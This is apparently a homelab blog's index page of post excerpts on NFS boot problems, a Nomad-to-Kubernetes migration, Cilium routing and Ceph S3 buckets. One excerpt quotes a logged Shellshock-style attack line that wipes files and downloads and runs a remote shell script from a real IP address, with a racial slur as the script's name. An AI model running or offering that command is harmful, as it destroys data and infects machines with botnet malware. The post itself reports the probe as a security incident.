NFS problems with new Ubuntu 22.04 kernel

Yesterday’s Homelab host update did not at all go as intended. I hit a kernel bug in the NFS code. To describe the problem, I need to go into a bit of detail on my setup, so please bear with me. I’ve got a fleet of 8 Raspberry Pi CM4 and a single Udoo x86 II forming the backbone of the compute in my Homelab. All of them do netbooting, with no per-host storage at all. To be able to do host updates, including kernels, the boot files used for netbooting are separated per host, and each host’s files are mounted to that host’s /boot/firmware dir via NFS. It looks something like this: ...

February 17, 2024 · 6 min · Michael
The HashiCorp Nomad and Kubernetes logos, connected with an arrow pointing from Nomad to Kubernetes

Nomad to k8s, Part 6: Logging with FluentD, Fluentbit and Loki

Wherein I document how I migrated my logging setup from Nomad to k8s. This is part seven of my k8s migration series. Setup overview Let’s start with an overview of the setup. Overview of my logging pipeline. ...

February 13, 2024 · 30 min · Michael

Sunday Morning Panic

I just had a slight Sunday morning panic. I finished my logging setup yesterday night, and had a look at my FluentD logs this morning to see whether I got any errors or unparsed logs. At the very top of the logs, I got this entry: error="#<Fluent::Plugin::Parser::ParserError: pattern not matched with data '{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\", \"time\":\"2024-02-11T04:54:25+01:00\"}'>" location= tag=services.traefik.traefik.docker.anon time=1707623665 record="{ \"log\"=>\"{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\\\", \\\"time\\\":\\\"2024-02-11T04:54:25+01:00\\\" }\", \"logsubstream\"=>\"docker\", \"nomad_job_id\"=>\"traefik\", \"nomad_task_name\"=>\"traefik\", \"nomad_node_name\"=>\"anon\"}" message="dump an error event: error_class=Fluent::Plugin::Parser::ParserError error=\"pattern not matched with data '{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\\\", \\\"time\\\":\\\"2024-02-11T04:54:25+01:00\\\"}'\" location=nil tag=\"services.traefik.traefik.docker.anon\" time=2024-02-11 03:54:25.149520221 +0000 record={\"log\"=>\"{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\\\", \\\"time\\\":\\\"2024-02-11T04:54:25+01:00\\\"}\", \"logsubstream\"=>\"docker\", \"nomad_job_id\"=>\"traefik\", \"nomad_task_name\"=>\"traefik\", \"nomad_node_name\"=>\"anon\"}" host=anon level=warning That looked suspicious, to say the least. After some googling for the nigga.sh file, I landed on this page from Akamai. I describes an attack by the Mirai botnet. ...

February 11, 2024 · 4 min · Michael
The HashiCorp Nomad and Kubernetes logos, connected with an arrow pointing from Nomad to Kubernetes

Nomad to k8s, Part 2b: Asymmetric Routing

Wherein I ran into some problems with the Cilium BGP routing and firewalls on my OPNsense box. This is the second addendum for Cilium load balancing in my k8s migration series. While working on my S3 bucket migration, I ran into several rather weird problems. After switching my internal wiki over to using the Ceph RGW S3 from my k8s Ceph Rook cluster, I found that the final upload of the generated site to the S3 bucket from which it was served did not work, even though I had all the necessary firewall rules configured. The output I was getting looked like this: ...

February 4, 2024 · 10 min · Michael
The HashiCorp Nomad and Kubernetes logos, connected with an arrow pointing from Nomad to Kubernetes

Nomad to k8s, Part 5: Non-service S3 Buckets

Wherein I document how I migrated some S3 buckets over to the Ceph Rook cluster and with that, made it load-bearing. This is part six of my k8s migration series. So why write a post about migrating S3 buckets, and why do it at this point of the Nomad -> k8s migration? In short, it just fit in here very well. I already planned to make Ceph Rook one of the first services to set up anyway. And then the logical next step is to have a look at what I can then migrate over without any other dependencies. And the answer to that was: Some non-service S3 buckets. With “non-service” I mean those buckets which are not directly tied to specific services running on the cluster, like Mastodon’s media files bucket or Loki’s log storage bucket. Those I will migrate over with their respective services. ...

January 25, 2024 · 21 min · Michael